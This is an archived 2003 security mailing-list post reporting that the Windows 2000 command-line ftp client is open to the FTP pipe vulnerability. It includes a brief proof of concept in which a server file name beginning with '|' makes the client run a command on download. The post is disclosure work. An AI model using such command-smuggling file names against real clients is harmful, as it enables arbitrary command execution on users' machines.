[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.GSO.4.53.0302251202460.4977@europa.oicinc.com>
From: schoe at oicinc.com (SChoe)
Subject: RE: Multiple Vendor FTP pipe Vulnerability
Securityfocus has a post on its website regarding this vulnerability in
many ftp clients. I've tested and subsequently validated this issue on
many of the platforms mentioned in their advisory. They mention
that the Netscape client on Windows 2000 Professional, but fails to
mention that the commandline ftp client included with win2k (server and
pro) are also vulnerable.
<-----------------------snip----------------------->
# Create file on ftp server for download by client.
schoe@ftp:/home/ftp$ touch \|touch\ file
# Start commandline ftp client on win2k.
Microsoft Windows 2000 [Version 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.
C:\ ftp ftp.xxxx.com
....
ftp> get "|touch file.txt"
...
ftp> quit
221 Goodbye.
# "C:\file.txt" should now exist.
<-----------------------snap----------------------->
Multiple Vendor VTP pipe Vulnerability
======================================
www.securityfocus.com/bid/396/info
.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
Powered by blists - more mailing lists